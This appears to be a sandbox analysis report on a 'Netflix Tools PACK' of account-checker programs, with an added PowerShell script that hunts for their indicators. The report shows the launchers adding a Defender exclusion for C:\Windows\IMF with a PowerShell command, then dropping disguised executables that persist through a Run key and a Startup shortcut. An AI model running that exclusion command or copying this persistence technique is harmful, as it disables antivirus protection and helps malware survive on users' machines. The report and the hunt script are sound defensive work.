| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\HITFLIX CHECKER.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\HITFLIX CHECKER.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\Launcher.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\serv.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\HITFLIX CHECKER\sys\serv.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
| Country | Destination | Domain | Proto |
| NL | 8.238.22.126:80 | | tcp |
| US | 8.8.8.8:53 | 126.211.247.8.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fm2nucty.1kp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
Analysis: behavioral11
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
30s
Max time network
28s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\NetFlix GC Checker by xRisky.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\NetFlix GC Checker by xRisky.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\NetFlix GC Checker by xRisky.exe"
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\litedb.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\litedb.exe"
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 93.184.221.240:80 | | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2xzk4kca.04g.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
Analysis: behavioral31
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:59
Platform
win10v2004-20230621-en
Max time kernel
39s
Max time network
45s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\Launcher.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 20.189.173.13:443 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vy0agduf.zhv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/4720-170-0x0000000006690000-0x00000000066AE000-memory.dmp
memory/4692-178-0x0000000005E10000-0x0000000005E86000-memory.dmp
memory/4692-179-0x0000000005DF0000-0x0000000005E0E000-memory.dmp
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
C:\Windows\IMF\Windows Services.exe
| MD5 | ad0ce1302147fbdfecaec58480eb9cf9 |
| SHA1 | 874efbc76e5f91bc1425a43ea19400340f98d42b |
| SHA256 | 2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3 |
| SHA512 | adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53 |
memory/3924-194-0x0000000000C90000-0x0000000000CA2000-memory.dmp
C:\Windows\IMF\Secure System Shell.exe
| MD5 | 7d0c7359e5b2daa5665d01afdc98cc00 |
| SHA1 | c3cc830c8ffd0f53f28d89dcd9f3426be87085cb |
| SHA256 | f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809 |
| SHA512 | a8f82b11b045d8dd744506f4f56f3382b33a03684a6aebc91a02ea901c101b91cb43b7d0213f72f39cbb22f616ecd5de8b9e6c99fb5669f26a3ea6bcb63c8407 |
memory/3924-195-0x0000000005680000-0x0000000005690000-memory.dmp
memory/4720-197-0x00000000052C0000-0x00000000052D0000-memory.dmp
C:\Windows\IMF\Runtime Explorer.exe
| MD5 | ec70c6f4dc443c5ab2b91d64ae04fa8e |
| SHA1 | 43eb3b3289782fced204f0b4e3edad2ba1b085b7 |
| SHA256 | 276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d |
| SHA512 | 6217c232edbcf60ae1337120aa9b51956e06f591c660fd720b02fe8abf01923dd4dca28f69ece88c12c705a4c3a392d0cbb6f4f6c6759306123db141ed05d584 |
memory/4540-201-0x0000000000010000-0x0000000000022000-memory.dmp
memory/4540-203-0x0000000004970000-0x0000000004980000-memory.dmp
memory/4720-205-0x0000000007640000-0x0000000007672000-memory.dmp
memory/4720-206-0x00000000700C0000-0x000000007010C000-memory.dmp
memory/4720-216-0x0000000006C50000-0x0000000006C6E000-memory.dmp
memory/4720-217-0x000000007F990000-0x000000007F9A0000-memory.dmp
memory/4720-218-0x0000000007FF0000-0x000000000866A000-memory.dmp
memory/4720-219-0x00000000079A0000-0x00000000079BA000-memory.dmp
memory/4720-220-0x0000000007A10000-0x0000000007A1A000-memory.dmp
memory/4720-221-0x0000000007C20000-0x0000000007CB6000-memory.dmp
memory/4720-222-0x0000000007BD0000-0x0000000007BDE000-memory.dmp
memory/4720-223-0x0000000007CE0000-0x0000000007CFA000-memory.dmp
memory/4720-224-0x0000000007CC0000-0x0000000007CC8000-memory.dmp
memory/3924-227-0x0000000005680000-0x0000000005690000-memory.dmp
memory/4540-228-0x0000000004970000-0x0000000004980000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
17s
Max time network
22s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\NetCheck.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix Checker by xRisky v2\debug\NetCheck.exe"
Network
Files
memory/5048-133-0x0000000000FE0000-0x000000000161C000-memory.dmp
memory/5048-134-0x0000000005F20000-0x0000000005F40000-memory.dmp
memory/5048-135-0x0000000006360000-0x00000000063B4000-memory.dmp
memory/5048-136-0x0000000006970000-0x0000000006F14000-memory.dmp
memory/5048-137-0x0000000006460000-0x00000000064F2000-memory.dmp
memory/5048-138-0x0000000007450000-0x000000000797C000-memory.dmp
memory/5048-139-0x0000000006620000-0x00000000066BC000-memory.dmp
memory/5048-140-0x00000000063D0000-0x00000000063DA000-memory.dmp
memory/5048-141-0x0000000006F20000-0x0000000006F76000-memory.dmp
memory/5048-142-0x0000000007110000-0x0000000007120000-memory.dmp
memory/5048-143-0x0000000007110000-0x0000000007120000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2023-06-23 22:56
Reported
2023-06-23 22:58
Platform
win10v2004-20230621-en
Max time kernel
32s
Max time network
29s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\Control Panel\International\Geo\Nation | C:\Windows\IMF\Windows Services.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Startup.lnk | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-508929744-1894537824-211734425-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Explorer = "C:\\Windows\\IMF\\\\Windows Services.exe" | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\Launcher.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\Launcher.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| N/A | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\Launcher.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Windows Services.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\IMF\Secure System Shell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\IMF\Runtime Explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath C:\Windows\IMF\
C:\Windows\IMF\Windows Services.exe
"C:\Windows\IMF\Windows Services.exe" {Arguments If Needed}
C:\Windows\IMF\Secure System Shell.exe
"C:\Windows\IMF\Secure System Shell.exe"
C:\Windows\IMF\Runtime Explorer.exe
"C:\Windows\IMF\Runtime Explorer.exe"
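The process tree above is the whole chain in one screen: Launcher.exe spawns powershell.exe with `add-mppreference -exclusionpath C:\Windows\IMF\`, then drops and runs three unsigned executables from that now-excluded directory, and persists them through a Run value named "Runtime Explorer" that actually points at "Windows Services.exe" plus a "Microsoft Startup.lnk" in the user's Startup folder. Two details worth reading off the report: the PowerShell image is the SysWOW64 binary although the command line names System32, which is WOW64 file-system redirection from a 32-bit parent; and Add-MpPreference needs administrator rights, so on a non-admin host the exclusion step fails while the Run value and the Startup shortcut still succeed, meaning an absent exclusion is not evidence the rest is absent. The script below is an added host-side hunt for these indicators; it is not part of the sandbox report and not code from the sample. It assumes an elevated PowerShell session on a Windows 10 host with Defender installed; the three SHA256 values are taken from this report's Files section, and the file is matched by hash rather than name because the dropper's file names are chosen to look like system components.

```powershell
# Added example (not sandbox output): live-state hunt for the persistence chain
# recorded in this report. Run elevated on the suspect Windows host. The three SHA256
# values are copied from the report's Files section; everything else is assumption.

$DropDir  = 'C:\Windows\IMF'
$RunValue = 'Runtime Explorer'          # value name written under ...\CurrentVersion\Run
$LnkName  = 'Microsoft Startup.lnk'     # shortcut dropped in the Startup folder
$KnownBad = @{
    '2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3' = 'Windows Services.exe'
    'f1abd5ab03189e82971513e6ca04bd372fcf234d670079888f01cf4addd49809' = 'Secure System Shell.exe'
    '276f1bfc6256f4c1ddd544d5a556d299ebddcf200a64ee7c9c3edef686df727d' = 'Runtime Explorer.exe'
}
$findings = New-Object System.Collections.Generic.List[string]

# 1. Defender exclusion created by "powershell.exe add-mppreference -exclusionpath C:\Windows\IMF\"
try {
    $excl = (Get-MpPreference -ErrorAction Stop).ExclusionPath
    foreach ($p in $excl) {
        if ($p -like 'C:\Windows\IMF*') { $findings.Add("Defender exclusion: $p") }
    }
} catch { $findings.Add("Could not read Defender preferences: $($_.Exception.Message)") }

# 2. Run value in every loaded user hive (the report records it under the user's SID, not HKLM)
Get-ChildItem Registry::HKEY_USERS |
    Where-Object { $_.PSChildName -match '^S-1-5-21-\d+-\d+-\d+-\d+$' } |
    ForEach-Object {
        $runKey = "Registry::$($_.Name)\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
        $val = (Get-ItemProperty -Path $runKey -Name $RunValue -ErrorAction SilentlyContinue).$RunValue
        if ($val) { $findings.Add("Run value '$RunValue' in $($_.PSChildName) = $val") }
    }

# 3. Startup-folder shortcut in every profile, resolving where it points
$shell = New-Object -ComObject WScript.Shell
Get-ChildItem 'C:\Users' -Directory | ForEach-Object {
    $lnk = Join-Path $_.FullName "AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$LnkName"
    if (Test-Path -LiteralPath $lnk) {
        $target = $shell.CreateShortcut($lnk).TargetPath
        $findings.Add("Startup shortcut $lnk -> $target")
    }
}

# 4. Files in the drop directory, matched by SHA256 so renamed copies are still caught
if (Test-Path -LiteralPath $DropDir) {
    Get-ChildItem -LiteralPath $DropDir -File -Recurse | ForEach-Object {
        $h = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash.ToLower()
        if ($KnownBad.ContainsKey($h)) {
            $findings.Add("Known-bad file $($_.FullName) = $($KnownBad[$h]) from report")
        } else {
            $findings.Add("Unlisted file in drop dir: $($_.FullName) sha256=$h")
        }
    }
}

# 5. Anything currently executing out of the drop directory, with its parent PID for context
Get-CimInstance Win32_Process |
    Where-Object { $_.ExecutablePath -like "$DropDir\*" } |
    ForEach-Object {
        $findings.Add("Live process PID $($_.ProcessId) $($_.ExecutablePath) parent PID $($_.ParentProcessId)")
    }

if ($findings.Count -eq 0) { 'No indicators from this report found on this host.' } else { $findings }
```

Section 4 reports any file in C:\Windows\IMF that is not one of the three listed hashes rather than ignoring it, since a later build of the same dropper would change the hashes but not the directory. When a hit is confirmed, remove the exclusion with Remove-MpPreference -ExclusionPath before deleting the files, otherwise Defender will keep ignoring whatever is written there next.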
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.125.24.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.121.18.2.in-addr.arpa | udp |
Files
memory/4848-133-0x0000000000780000-0x0000000000794000-memory.dmp
memory/4848-134-0x00000000057F0000-0x0000000005D94000-memory.dmp
memory/4848-135-0x0000000005160000-0x00000000051F2000-memory.dmp
